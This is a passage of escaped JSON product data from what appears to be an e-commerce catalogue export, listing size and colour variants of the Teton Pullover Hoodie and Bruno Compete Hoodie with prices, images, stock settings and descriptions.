Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},{\"sku\":\"MH02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Wool|Fleece|Nylon,pattern=Solid,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH02-XS-Black,size=XS,color=Black|sku=MH02-XS-Purple,size=XS,color=Purple|sku=MH02-XS-Red,size=XS,color=Red|sku=MH02-S-Black,size=S,color=Black|sku=MH02-S-Purple,size=S,color=Purple|sku=MH02-S-Red,size=S,color=Red|sku=MH02-M-Black,size=M,color=Black|sku=MH02-M-Purple,size=M,color=Purple|sku=MH02-M-Red,size=M,color=Red|sku=MH02-L-Black,size=L,color=Black|sku=MH02-L-Purple,size=L,color=Purple|sku=MH02-L-Red,size=L,color=Red|sku=MH02-XL-Black,size=XL,color=Black|sku=MH02-XL-Purple,size=XL,color=Purple|sku=MH02-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Wool|Fleece|Nylon\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},{\"sku\":\"MH03-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-XS-Black\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},{\"sku\":\"MH03-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-XS-Blue\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},{\"sku\":\"MH03-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-XS-Green\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},{\"sku\":\"MH03-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-S-Black\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},{\"sku\":\"MH03-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-S-Blue\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},{\"sku\":\"MH03-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-S-Green\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},{\"sku\":\"MH03-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bruno Compete Hoodie-M-Black\",\"description\":\"<p>Stay comfortable and stay in the race no matter what the weather\'s up to. The Bruno Compete Hoodie\'s water-repellent exterior shields you from the elements, while advanced fabric technology inside wicks moisture to keep you dry.<\\/p>\\n<p>&bull; Full zip black hoodie pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Kangaroo pocket. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bruno-compete-hoodie-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_